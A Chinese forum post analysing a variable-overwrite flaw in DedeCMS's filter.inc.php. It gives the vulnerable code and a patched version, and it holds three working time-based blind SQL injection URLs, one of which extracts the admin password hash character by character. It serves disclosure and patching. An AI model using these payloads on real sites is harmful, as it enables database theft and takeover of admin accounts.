全球中文玩家俱乐部 Chinese players club of the Global .

侠外游戏论坛

 找回密码
 立即注册
快捷导航
搜索
视听
视听
图片
图片
段子
段子
小说
小说
查看: 2005|回复: 5
打印 上一主题 下一主题
收起左侧

[闲聊技术] dedecms /include/filter.inc.php Local Variable Overriding

[复制链接]
ミ蒙面侠客ミ
跳转到指定楼层
俺是撸主
ミ蒙面侠客ミ  发表于 2017-6-21 01:25:28 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多侠客,享用更多功能,让你轻松玩转侠外论坛。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
catalog
1. 漏洞描述2. 漏洞触发条件3. 漏洞影响范围4. 漏洞代码分析5. 防御方法6. 攻防思考

1. 漏洞描述
filter.inc.php这个文件在系统配置文件之后,里面有foreach循环创建变量,所以可以覆盖系统变量
[url=][/url]
1. 在magic_quotes_gpc=off的时候可以绕过_RunMagicQuotes的过滤 xxx.php?site=LittleHann’s blog2. 经过common.inc.php$LittleHann = LittleHann\’s blog3. 经过filter.inc.php$LittleHann = LittleHann’s blog//重新获得闭合攻击性[url=][/url]


2. 漏洞触发条件
[url=][/url]
1. 程序不允许创建cfg_开头的变量,依靠这样来防御系统变量未初始化漏洞2. common.inc.php文件的漏洞我们创建了系统变量就可以触发此类漏洞,但是有的系统变量已经初始化了,而且是在common.inc.php文件foreach循环注册变量之后,就是说我们能创建,但是没法覆盖3. 但是filter.inc.php这个文件又进行了一次foreach循环也就是二次创建。所以如果包含了filter.inc.php文件我们就可以覆盖系统变量 4. 在/member目录的大部分文件都包含这么一个文件/member/config.php,这个文件的前两句就是require_once(dirname(__FILE__).’/../include/common.inc.php’);require_once(DEDEINC.’/filter.inc.php’);//就是说/member目录的大部分文件都受此漏洞影响可以覆盖系统变量 [url=][/url]

0x1: POC1
http://127.0.0.1/dedecms5.5/member/ajax_membergroup.php?action=desshow&mid=1&action=despost&mdescription=asd'  where id=@`'` or(select if(substring((select pwd from dede_admin),1,1)='f',sleep(5),0)) -- - @`'`
0x2: POC2
http://127.0.0.1/dede/member/ajax_membergroup.php?action=desshow&mid=1&action=despost&mdescription=asd'  where id=@`'` or(select if(substring((select 1),1,1)='1',sleep(5),0)) -- - @`'`
0x3: POC3
http://127.0.0.1/dede/member/ajax_membergroup.php?action=desshow&mid=1&action=despost&mdescription=asd'  where id=@`'` or(select if(substring((select user()),1,1)='r',sleep(5),0)) -- - @`'`
Relevant Link:
http://www.0x50sec.org/0day-exp/2011/08/id/1139/http://www.wooyun.org/bugs/wooyun-2013-043674

3. 漏洞影响范围
4. 漏洞代码分析
/include/filter.inc.php
[url=][/url]
function _FilterAll($fk,&$svar){    global $cfg_notallowstr,$cfg_replacestr;    if( is_array($svar) )    {        foreach($svar as $_k => $_v)        {            $svar[$_k] = _FilterAll($fk,$_v);        }    }    else    {        if($cfg_notallowstr!='' && eregi($cfg_notallowstr,$svar))        {            ShowMsg(" $fk has not allow words!",'-1');            exit();        }        if($cfg_replacestr!='')        {            $svar = eregi_replace($cfg_replacestr,"***",$svar);        }    }    //未对外部提交的数据进行有效转义,重新造成本地变量注入    return $svar;}foreach(Array('_GET','_POST','_COOKIE') as $_request){    foreach($$_request as $_k => $_v)    {        ${$_k} = _FilterAll($_k,$_v);    }}[url=][/url]

Relevant Link:
http://zone.wooyun.org/content/1883http://www.jybase.net/wangzhananquan/20120412823_8.html

5. 防御方法
/include/filter.inc.php
[url=][/url]
function _FilterAll($fk, &$svar){    global $cfg_notallowstr,$cfg_replacestr;    if( is_array($svar) )    {        foreach($svar as $_k => $_v)        {            $svar[$_k] = _FilterAll($fk,$_v);        }    }    else    {        if($cfg_notallowstr!='' && preg_match("#".$cfg_notallowstr."#i", $svar))        {            ShowMsg(" $fk has not allow words!",'-1');            exit();        }        if($cfg_replacestr!='')        {            $svar = preg_replace('/'.$cfg_replacestr.'/i', "***", $svar);        }    }    /* 进行有效转义 */    /**/    return addslashes($svar);}/* 对_GET,_POST,_COOKIE进行过滤 */foreach(Array('_GET','_POST','_COOKIE') as $_request){    foreach($$_request as $_k => $_v)    {        ${$_k} = _FilterAll($_k,$_v);    }}[url=][/url]


6. 攻防思考

沙花按摩
发表于 2017-6-21 09:00:14 | 只看该作者
使人们宁愿相信谬误,而不愿热爱真理的原因,不仅由于探索真理是艰苦的,而且是由于谬误更能迎合人类某些恶劣的天性。
这里是你的个性签名位置,可在“设置”-“个人信息”-“个人签名”处修改。
板凳捶腿
发表于 2017-6-23 13:11:58 | 只看该作者
世上友谊本罕见,平等友情更难求。
这里是你的个性签名位置,可在“设置”-“个人信息”-“个人签名”处修改。
地板擦鞋
发表于 2017-6-26 14:46:38 | 只看该作者
干掉鸟人我就是天使.
这里是你的个性签名位置,可在“设置”-“个人信息”-“个人签名”处修改。
5位围观
发表于 2021-6-18 03:18:13 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

6位围观
发表于 2022-2-20 01:44:56 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
这里是你的个性签名位置,可在“设置”-“个人信息”-“个人签名”处修改。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则


发布主题 上个主题 下个主题 快速回复 收藏帖子 返回列表 搜索

联系我们|Archiver|手机版|小黑屋|侠外网 ( 豫ICP备13018943号-1 )

GMT+8, 2024-12-23 05:16 , Processed in 0.047196 second(s), 18 queries , Gzip On, Memcache On.

Copyright © 2001-2023 侠外游戏论坛 Powered by !Zucsud X3.5

Support By A mysterious team , A great team ! Email:

快速回复 返回顶部 返回列表